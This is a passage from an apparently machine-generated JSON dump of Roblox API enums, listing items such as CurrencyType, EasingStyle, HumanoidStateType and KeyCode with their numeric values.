","Name":"Group","tags":[],"Value":1,"Enum":"CreatorType"},{"type":"Enum","Name":"CurrencyType","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"CurrencyType"},{"type":"EnumItem","Name":"Robux","tags":[],"Value":1,"Enum":"CurrencyType"},{"type":"EnumItem","Name":"Tix","tags":[],"Value":2,"Enum":"CurrencyType"},{"type":"Enum","Name":"CustomCameraMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"CustomCameraMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"CustomCameraMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"CustomCameraMode"},{"type":"Enum","Name":"DevCameraOcclusionMode","tags":[]},{"type":"EnumItem","Name":"Zoom","tags":[],"Value":0,"Enum":"DevCameraOcclusionMode"},{"type":"EnumItem","Name":"Invisicam","tags":[],"Value":1,"Enum":"DevCameraOcclusionMode"},{"type":"Enum","Name":"DevComputerCameraMovementMode","tags":[]},{"type":"EnumItem","Name":"UserChoice","tags":[],"Value":0,"Enum":"DevComputerCameraMovementMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"DevComputerCameraMovementMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"DevComputerCameraMovementMode"},{"type":"Enum","Name":"DevComputerMovementMode","tags":[]},{"type":"EnumItem","Name":"UserChoice","tags":[],"Value":0,"Enum":"DevComputerMovementMode"},{"type":"EnumItem","Name":"KeyboardMouse","tags":[],"Value":1,"Enum":"DevComputerMovementMode"},{"type":"EnumItem","Name":"ClickToMove","tags":[],"Value":2,"Enum":"DevComputerMovementMode"},{"type":"EnumItem","Name":"Scriptable","tags":[],"Value":3,"Enum":"DevComputerMovementMode"},{"type":"Enum","Name":"DevTouchCameraMovementMode","tags":[]},{"type":"EnumItem","Name":"UserChoice","tags":[],"Value":0,"Enum":"DevTouchCameraMovementMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"DevTouchCameraMovementMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"DevTouchCameraMovementMode"},{"type":"Enum","Name":"DevTouchMovementMode","tags":[]},{"type":"EnumItem","Name":"UserChoice","tags":[],"Value":0,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"Thumbstick","tags":[],"Value":1,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"DPad","tags":[],"Value":2,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"Thumbpad","tags":[],"Value":3,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"ClickToMove","tags":[],"Value":4,"Enum":"DevTouchMovementMode"},{"type":"EnumItem","Name":"Scriptable","tags":[],"Value":5,"Enum":"DevTouchMovementMode"},{"type":"Enum","Name":"DialogPurpose","tags":[]},{"type":"EnumItem","Name":"Quest","tags":[],"Value":0,"Enum":"DialogPurpose"},{"type":"EnumItem","Name":"Help","tags":[],"Value":1,"Enum":"DialogPurpose"},{"type":"EnumItem","Name":"Shop","tags":[],"Value":2,"Enum":"DialogPurpose"},{"type":"Enum","Name":"DialogTone","tags":[]},{"type":"EnumItem","Name":"Neutral","tags":[],"Value":0,"Enum":"DialogTone"},{"type":"EnumItem","Name":"Friendly","tags":[],"Value":1,"Enum":"DialogTone"},{"type":"EnumItem","Name":"Enemy","tags":[],"Value":2,"Enum":"DialogTone"},{"type":"Enum","Name":"EasingDirection","tags":[]},{"type":"EnumItem","Name":"In","tags":[],"Value":0,"Enum":"EasingDirection"},{"type":"EnumItem","Name":"Out","tags":[],"Value":1,"Enum":"EasingDirection"},{"type":"EnumItem","Name":"InOut","tags":[],"Value":2,"Enum":"EasingDirection"},{"type":"Enum","Name":"EasingStyle","tags":[]},{"type":"EnumItem","Name":"Linear","tags":[],"Value":0,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Sine","tags":[],"Value":1,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Back","tags":[],"Value":2,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Quad","tags":[],"Value":3,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Quart","tags":[],"Value":4,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Quint","tags":[],"Value":5,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Bounce","tags":[],"Value":6,"Enum":"EasingStyle"},{"type":"EnumItem","Name":"Elastic","tags":[],"Value":7,"Enum":"EasingStyle"},{"type":"Enum","Name":"EnviromentalPhysicsThrottle","tags":[]},{"type":"EnumItem","Name":"DefaultAuto","tags":[],"Value":0,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Disabled","tags":[],"Value":1,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Always","tags":[],"Value":2,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Skip2","tags":[],"Value":3,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Skip4","tags":[],"Value":4,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Skip8","tags":[],"Value":5,"Enum":"EnviromentalPhysicsThrottle"},{"type":"EnumItem","Name":"Skip16","tags":[],"Value":6,"Enum":"EnviromentalPhysicsThrottle"},{"type":"Enum","Name":"ErrorReporting","tags":[]},{"type":"EnumItem","Name":"DontReport","tags":[],"Value":0,"Enum":"ErrorReporting"},{"type":"EnumItem","Name":"Prompt","tags":[],"Value":1,"Enum":"ErrorReporting"},{"type":"EnumItem","Name":"Report","tags":[],"Value":2,"Enum":"ErrorReporting"},{"type":"Enum","Name":"ExplosionType","tags":[]},{"type":"EnumItem","Name":"NoCraters","tags":[],"Value":0,"Enum":"ExplosionType"},{"type":"EnumItem","Name":"Craters","tags":[],"Value":1,"Enum":"ExplosionType"},{"type":"EnumItem","Name":"CratersAndDebris","tags":[],"Value":2,"Enum":"ExplosionType"},{"type":"Enum","Name":"FilterResult","tags":[]},{"type":"EnumItem","Name":"Rejected","tags":[],"Value":1,"Enum":"FilterResult"},{"type":"EnumItem","Name":"Accepted","tags":[],"Value":0,"Enum":"FilterResult"},{"type":"Enum","Name":"Font","tags":[]},{"type":"EnumItem","Name":"Legacy","tags":[],"Value":0,"Enum":"Font"},{"type":"EnumItem","Name":"Arial","tags":[],"Value":1,"Enum":"Font"},{"type":"EnumItem","Name":"ArialBold","tags":[],"Value":2,"Enum":"Font"},{"type":"EnumItem","Name":"SourceSans","tags":[],"Value":3,"Enum":"Font"},{"type":"EnumItem","Name":"SourceSansBold","tags":[],"Value":4,"Enum":"Font"},{"type":"EnumItem","Name":"SourceSansLight","tags":[],"Value":5,"Enum":"Font"},{"type":"EnumItem","Name":"SourceSansItalic","tags":[],"Value":6,"Enum":"Font"},{"type":"Enum","Name":"FontSize","tags":[]},{"type":"EnumItem","Name":"Size8","tags":[],"Value":0,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size9","tags":[],"Value":1,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size10","tags":[],"Value":2,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size11","tags":[],"Value":3,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size12","tags":[],"Value":4,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size14","tags":[],"Value":5,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size18","tags":[],"Value":6,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size24","tags":[],"Value":7,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size36","tags":[],"Value":8,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size48","tags":[],"Value":9,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size28","tags":[],"Value":10,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size32","tags":[],"Value":11,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size42","tags":[],"Value":12,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size60","tags":[],"Value":13,"Enum":"FontSize"},{"type":"EnumItem","Name":"Size96","tags":[],"Value":14,"Enum":"FontSize"},{"type":"Enum","Name":"FormFactor","tags":[]},{"type":"EnumItem","Name":"Symmetric","tags":[],"Value":0,"Enum":"FormFactor"},{"type":"EnumItem","Name":"Brick","tags":[],"Value":1,"Enum":"FormFactor"},{"type":"EnumItem","Name":"Plate","tags":[],"Value":2,"Enum":"FormFactor"},{"type":"EnumItem","Name":"Custom","tags":[],"Value":3,"Enum":"FormFactor"},{"type":"Enum","Name":"FrameStyle","tags":[]},{"type":"EnumItem","Name":"Custom","tags":[],"Value":0,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"ChatBlue","tags":[],"Value":1,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"RobloxSquare","tags":[],"Value":2,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"RobloxRound","tags":[],"Value":3,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"ChatGreen","tags":[],"Value":4,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"ChatRed","tags":[],"Value":5,"Enum":"FrameStyle"},{"type":"EnumItem","Name":"DropShadow","tags":[],"Value":6,"Enum":"FrameStyle"},{"type":"Enum","Name":"FramerateManagerMode","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"FramerateManagerMode"},{"type":"EnumItem","Name":"On","tags":[],"Value":1,"Enum":"FramerateManagerMode"},{"type":"EnumItem","Name":"Off","tags":[],"Value":2,"Enum":"FramerateManagerMode"},{"type":"Enum","Name":"FriendRequestEvent","tags":[]},{"type":"EnumItem","Name":"Issue","tags":[],"Value":0,"Enum":"FriendRequestEvent"},{"type":"EnumItem","Name":"Revoke","tags":[],"Value":1,"Enum":"FriendRequestEvent"},{"type":"EnumItem","Name":"Accept","tags":[],"Value":2,"Enum":"FriendRequestEvent"},{"type":"EnumItem","Name":"Deny","tags":[],"Value":3,"Enum":"FriendRequestEvent"},{"type":"Enum","Name":"FriendStatus","tags":[]},{"type":"EnumItem","Name":"Unknown","tags":[],"Value":0,"Enum":"FriendStatus"},{"type":"EnumItem","Name":"NotFriend","tags":[],"Value":1,"Enum":"FriendStatus"},{"type":"EnumItem","Name":"Friend","tags":[],"Value":2,"Enum":"FriendStatus"},{"type":"EnumItem","Name":"FriendRequestSent","tags":[],"Value":3,"Enum":"FriendStatus"},{"type":"EnumItem","Name":"FriendRequestReceived","tags":[],"Value":4,"Enum":"FriendStatus"},{"type":"Enum","Name":"FunctionalTestResult","tags":[]},{"type":"EnumItem","Name":"Passed","tags":[],"Value":0,"Enum":"FunctionalTestResult"},{"type":"EnumItem","Name":"Warning","tags":[],"Value":1,"Enum":"FunctionalTestResult"},{"type":"EnumItem","Name":"Error","tags":[],"Value":2,"Enum":"FunctionalTestResult"},{"type":"Enum","Name":"GearGenreSetting","tags":[]},{"type":"EnumItem","Name":"AllGenres","tags":[],"Value":0,"Enum":"GearGenreSetting"},{"type":"EnumItem","Name":"MatchingGenreOnly","tags":[],"Value":1,"Enum":"GearGenreSetting"},{"type":"Enum","Name":"GearType","tags":[]},{"type":"EnumItem","Name":"MeleeWeapons","tags":[],"Value":0,"Enum":"GearType"},{"type":"EnumItem","Name":"RangedWeapons","tags":[],"Value":1,"Enum":"GearType"},{"type":"EnumItem","Name":"Explosives","tags":[],"Value":2,"Enum":"GearType"},{"type":"EnumItem","Name":"PowerUps","tags":[],"Value":3,"Enum":"GearType"},{"type":"EnumItem","Name":"NavigationEnhancers","tags":[],"Value":4,"Enum":"GearType"},{"type":"EnumItem","Name":"MusicalInstruments","tags":[],"Value":5,"Enum":"GearType"},{"type":"EnumItem","Name":"SocialItems","tags":[],"Value":6,"Enum":"GearType"},{"type":"EnumItem","Name":"BuildingTools","tags":[],"Value":7,"Enum":"GearType"},{"type":"EnumItem","Name":"Transport","tags":[],"Value":8,"Enum":"GearType"},{"type":"Enum","Name":"Genre","tags":[]},{"type":"EnumItem","Name":"All","tags":[],"Value":0,"Enum":"Genre"},{"type":"EnumItem","Name":"TownAndCity","tags":[],"Value":1,"Enum":"Genre"},{"type":"EnumItem","Name":"Fantasy","tags":[],"Value":2,"Enum":"Genre"},{"type":"EnumItem","Name":"SciFi","tags":[],"Value":3,"Enum":"Genre"},{"type":"EnumItem","Name":"Ninja","tags":[],"Value":4,"Enum":"Genre"},{"type":"EnumItem","Name":"Scary","tags":[],"Value":5,"Enum":"Genre"},{"type":"EnumItem","Name":"Pirate","tags":[],"Value":6,"Enum":"Genre"},{"type":"EnumItem","Name":"Adventure","tags":[],"Value":7,"Enum":"Genre"},{"type":"EnumItem","Name":"Sports","tags":[],"Value":8,"Enum":"Genre"},{"type":"EnumItem","Name":"Funny","tags":[],"Value":9,"Enum":"Genre"},{"type":"EnumItem","Name":"WildWest","tags":[],"Value":10,"Enum":"Genre"},{"type":"EnumItem","Name":"War","tags":[],"Value":11,"Enum":"Genre"},{"type":"EnumItem","Name":"SkatePark","tags":[],"Value":12,"Enum":"Genre"},{"type":"EnumItem","Name":"Tutorial","tags":[],"Value":13,"Enum":"Genre"},{"type":"Enum","Name":"GraphicsMode","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":1,"Enum":"GraphicsMode"},{"type":"EnumItem","Name":"Direct3D9","tags":[],"Value":3,"Enum":"GraphicsMode"},{"type":"EnumItem","Name":"Direct3D11","tags":[],"Value":2,"Enum":"GraphicsMode"},{"type":"EnumItem","Name":"OpenGL","tags":[],"Value":4,"Enum":"GraphicsMode"},{"type":"EnumItem","Name":"NoGraphics","tags":[],"Value":5,"Enum":"GraphicsMode"},{"type":"Enum","Name":"HandlesStyle","tags":[]},{"type":"EnumItem","Name":"Resize","tags":[],"Value":0,"Enum":"HandlesStyle"},{"type":"EnumItem","Name":"Movement","tags":[],"Value":1,"Enum":"HandlesStyle"},{"type":"Enum","Name":"HttpContentType","tags":[]},{"type":"EnumItem","Name":"ApplicationJson","tags":[],"Value":0,"Enum":"HttpContentType"},{"type":"EnumItem","Name":"ApplicationXml","tags":[],"Value":1,"Enum":"HttpContentType"},{"type":"EnumItem","Name":"ApplicationUrlEncoded","tags":[],"Value":2,"Enum":"HttpContentType"},{"type":"EnumItem","Name":"TextPlain","tags":[],"Value":3,"Enum":"HttpContentType"},{"type":"EnumItem","Name":"TextXml","tags":[],"Value":4,"Enum":"HttpContentType"},{"type":"Enum","Name":"HumanoidDisplayDistanceType","tags":[]},{"type":"EnumItem","Name":"Viewer","tags":[],"Value":0,"Enum":"HumanoidDisplayDistanceType"},{"type":"EnumItem","Name":"Subject","tags":[],"Value":1,"Enum":"HumanoidDisplayDistanceType"},{"type":"EnumItem","Name":"None","tags":[],"Value":2,"Enum":"HumanoidDisplayDistanceType"},{"type":"Enum","Name":"HumanoidRigType","tags":[]},{"type":"EnumItem","Name":"R6","tags":[],"Value":0,"Enum":"HumanoidRigType"},{"type":"EnumItem","Name":"R15","tags":[],"Value":1,"Enum":"HumanoidRigType"},{"type":"Enum","Name":"HumanoidStateType","tags":[]},{"type":"EnumItem","Name":"FallingDown","tags":[],"Value":0,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Running","tags":[],"Value":8,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"RunningNoPhysics","tags":[],"Value":10,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Climbing","tags":[],"Value":12,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"StrafingNoPhysics","tags":[],"Value":11,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Ragdoll","tags":[],"Value":1,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"GettingUp","tags":[],"Value":2,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Jumping","tags":[],"Value":3,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Landed","tags":[],"Value":7,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Flying","tags":[],"Value":6,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Freefall","tags":[],"Value":5,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Seated","tags":[],"Value":13,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"PlatformStanding","tags":[],"Value":14,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Dead","tags":[],"Value":15,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Swimming","tags":[],"Value":4,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"Physics","tags":[],"Value":16,"Enum":"HumanoidStateType"},{"type":"EnumItem","Name":"None","tags":[],"Value":18,"Enum":"HumanoidStateType"},{"type":"Enum","Name":"InOut","tags":[]},{"type":"EnumItem","Name":"Edge","tags":[],"Value":0,"Enum":"InOut"},{"type":"EnumItem","Name":"Inset","tags":[],"Value":1,"Enum":"InOut"},{"type":"EnumItem","Name":"Center","tags":[],"Value":2,"Enum":"InOut"},{"type":"Enum","Name":"InfoType","tags":[]},{"type":"EnumItem","Name":"Asset","tags":[],"Value":0,"Enum":"InfoType"},{"type":"EnumItem","Name":"Product","tags":[],"Value":1,"Enum":"InfoType"},{"type":"Enum","Name":"InputType","tags":[]},{"type":"EnumItem","Name":"NoInput","tags":[],"Value":0,"Enum":"InputType"},{"type":"EnumItem","Name":"LeftTread","tags":[],"Value":1,"Enum":"InputType"},{"type":"EnumItem","Name":"RightTread","tags":[],"Value":2,"Enum":"InputType"},{"type":"EnumItem","Name":"Steer","tags":[],"Value":3,"Enum":"InputType"},{"type":"EnumItem","Name":"Throtle","tags":[],"Value":4,"Enum":"InputType"},{"type":"EnumItem","Name":"UpDown","tags":[],"Value":6,"Enum":"InputType"},{"type":"EnumItem","Name":"Action1","tags":[],"Value":7,"Enum":"InputType"},{"type":"EnumItem","Name":"Action2","tags":[],"Value":8,"Enum":"InputType"},{"type":"EnumItem","Name":"Action3","tags":[],"Value":9,"Enum":"InputType"},{"type":"EnumItem","Name":"Action4","tags":[],"Value":10,"Enum":"InputType"},{"type":"EnumItem","Name":"Action5","tags":[],"Value":11,"Enum":"InputType"},{"type":"EnumItem","Name":"Constant","tags":[],"Value":12,"Enum":"InputType"},{"type":"EnumItem","Name":"Sin","tags":[],"Value":13,"Enum":"InputType"},{"type":"Enum","Name":"JointCreationMode","tags":[]},{"type":"EnumItem","Name":"All","tags":[],"Value":0,"Enum":"JointCreationMode"},{"type":"EnumItem","Name":"Surface","tags":[],"Value":1,"Enum":"JointCreationMode"},{"type":"EnumItem","Name":"None","tags":[],"Value":2,"Enum":"JointCreationMode"},{"type":"Enum","Name":"JointType","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":22,"Enum":"JointType"},{"type":"EnumItem","Name":"Rotate","tags":[],"Value":6,"Enum":"JointType"},{"type":"EnumItem","Name":"RotateP","tags":[],"Value":7,"Enum":"JointType"},{"type":"EnumItem","Name":"RotateV","tags":[],"Value":8,"Enum":"JointType"},{"type":"EnumItem","Name":"Glue","tags":[],"Value":9,"Enum":"JointType"},{"type":"EnumItem","Name":"Weld","tags":[],"Value":1,"Enum":"JointType"},{"type":"EnumItem","Name":"Snap","tags":[],"Value":3,"Enum":"JointType"},{"type":"Enum","Name":"KeyCode","tags":[]},{"type":"EnumItem","Name":"Unknown","tags":[],"Value":0,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Backspace","tags":[],"Value":8,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Tab","tags":[],"Value":9,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Clear","tags":[],"Value":12,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Return","tags":[],"Value":13,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Pause","tags":[],"Value":19,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Escape","tags":[],"Value":27,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Space","tags":[],"Value":32,"Enum":"KeyCode"},{"type":"EnumItem","Name":"QuotedDouble","tags":[],"Value":34,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Hash","tags":[],"Value":35,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Dollar","tags":[],"Value":36,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Percent","tags":[],"Value":37,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Ampersand","tags":[],"Value":38,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Quote","tags":[],"Value":39,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftParenthesis","tags":[],"Value":40,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightParenthesis","tags":[],"Value":41,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Asterisk","tags":[],"Value":42,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Plus","tags":[],"Value":43,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Comma","tags":[],"Value":44,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Minus","tags":[],"Value":45,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Period","tags":[],"Value":46,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Slash","tags":[],"Value":47,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Zero","tags":[],"Value":48,"Enum":"KeyCode"},{"type":"EnumItem","Name":"One","tags":[],"Value":49,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Two","tags":[],"Value":50,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Three","tags":[],"Value":51,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Four","tags":[],"Value":52,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Five","tags":[],"Value":53,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Six","tags":[],"Value":54,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Seven","tags":[],"Value":55,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Eight","tags":[],"Value":56,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Nine","tags":[],"Value":57,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Colon","tags":[],"Value":58,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Semicolon","tags":[],"Value":59,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LessThan","tags":[],"Value":60,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Equals","tags":[],"Value":61,"Enum":"KeyCode"},{"type":"EnumItem","Name":"GreaterThan","tags":[],"Value":62,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Question","tags":[],"Value":63,"Enum":"KeyCode"},{"type":"EnumItem","Name":"At","tags":[],"Value":64,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftBracket","tags":[],"Value":91,"Enum":"KeyCode"},{"type":"EnumItem","Name":"BackSlash","tags":[],"Value":92,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightBracket","tags":[],"Value":93,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Caret","tags":[],"Value":94,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Underscore","tags":[],"Value":95,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Backquote","tags":[],"Value":96,"Enum":"KeyCode"},{"type":"EnumItem","Name":"A","tags":[],"Value":97,"Enum":"KeyCode"},{"type":"EnumItem","Name":"B","tags":[],"Value":98,"Enum":"KeyCode"},{"type":"EnumItem","Name":"C","tags":[],"Value":99,"Enum":"KeyCode"},{"type":"EnumItem","Name":"D","tags":[],"Value":100,"Enum":"KeyCode"},{"type":"EnumItem","Name":"E","tags":[],"Value":101,"Enum":"KeyCode"},{"type":"EnumItem","Name":"F","tags":[],"Value":102,"Enum":"KeyCode"},{"type":"EnumItem","Name":"G","tags":[],"Value":103,"Enum":"KeyCode"},{"type":"EnumItem","Name":"H","tags":[],"Value":104,"Enum":"KeyCode"},{"type":"EnumItem","Name":"I","tags":[],"Value":105,"Enum":"KeyCode"},{"type":"EnumItem","Name":"J","tags":[],"Value":106,"Enum":"KeyCode"},{"type":"EnumItem","Name":"K","tags":[],"Value":107,"Enum":"KeyCode"},{"type":"EnumItem","Name":"L","tags":[],"Value":108,"Enum":"KeyCode"},{"type":"EnumItem","Name":"M","tags":[],"Value":109,"Enum":"KeyCode"},{"type":"EnumItem","Name":"N","tags":[],"Value":110,"Enum":"KeyCode"},{"type":"EnumItem","Name":"O","tags":[],"Value":111,"Enum":"KeyCode"},{"type":"EnumItem","Name":"P","tags":[],"Value":112,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Q","tags":[],"Value":113,"Enum":"KeyCode"},{"type":"EnumItem","Name":"R","tags":[],"Value":114,"Enum":"KeyCode"},{"type":"EnumItem","Name":"S","tags":[],"Value":115,"Enum":"KeyCode"},{"type":"EnumItem","Name":"T","tags":[],"Value":116,"Enum":"KeyCode"},{"type":"EnumItem","Name":"U","tags":[],"Value":117,"Enum":"KeyCode"},{"type":"EnumItem","Name":"V","tags":[],"Value":118,"Enum":"KeyCode"},{"type":"EnumItem","Name":"W","tags":[],"Value":119,"Enum":"KeyCode"},{"type":"EnumItem","Name":"X","tags":[],"Value":120,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Y","tags":[],"Value":121,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Z","tags":[],"Value":122,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftCurly","tags":[],"Value":123,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Pipe","tags":[],"Value":124,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightCurly","tags":[],"Value":125,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Tilde","tags":[],"Value":126,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Delete","tags":[],"Value":127,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadZero","tags":[],"Value":256,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadOne","tags":[],"Value":257,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadTwo","tags":[],"Value":258,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadThree","tags":[],"Value":259,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadFour","tags":[],"Value":260,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadFive","tags":[],"Value":261,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadSix","tags":[],"Value":262,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadSeven","tags":[],"Value":263,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadEight","tags":[],"Value":264,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadNine","tags":[],"Value":265,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadPeriod","tags":[],"Value":266,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadDivide","tags":[],"Value":267,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadMultiply","tags":[],"Value":268,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadMinus","tags":[],"Value":269,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadPlus","tags":[],"Value":270,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadEnter","tags":[],"Value":271,"Enum":"KeyCode"},{"type":"EnumItem","Name":"KeypadEquals","tags":[],"Value":272,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Up","tags":[],"Value":273,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Down","tags":[],"Value":274,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Right","tags":[],"Value":275,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Left","tags":[],"Value":276,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Insert","tags":[],"Value":277,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Home","tags":[],"Value":278,"Enum":"KeyCode"},{"type":"EnumItem","Name":"End","tags":[],"Value":279,"Enum":"KeyCode"},{"type":"EnumItem","Name":"PageUp","tags":[],"Value":280,"Enum":"KeyCode"},{"type":"EnumItem","Name":"PageDown","tags":[],"Value":281,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftShift","tags":[],"Value":304,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightShift","tags":[],"Value":303,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftMeta","tags":[],"Value":310,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightMeta","tags":[],"Value":309,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftAlt","tags":[],"Value":308,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightAlt","tags":[],"Value":307,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftControl","tags":[],"Value":306,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightControl","tags":[],"Value":305,"Enum":"KeyCode"},{"type":"EnumItem","Name":"CapsLock","tags":[],"Value":301,"Enum":"KeyCode"},{"type":"EnumItem","Name":"NumLock","tags":[],"Value":300,"Enum":"KeyCode"},{"type":"EnumItem","Name":"ScrollLock","tags":[],"Value":302,"Enum":"KeyCode"},{"type":"EnumItem","Name":"LeftSuper","tags":[],"Value":311,"Enum":"KeyCode"},{"type":"EnumItem","Name":"RightSuper","tags":[],"Value":312,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Mode","tags":[],"Value":313,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Compose","tags":[],"Value":314,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Help","tags":[],"Value":315,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Print","tags":[],"Value":316,"Enum":"KeyCode"},{"type":"EnumItem","Name":"SysReq","tags":[],"Value":317,"Enum":"KeyCode"},{"type":"EnumItem","Name":"Break","tags":[],"Value":318,"Enum":"KeyCode"},{"type":"E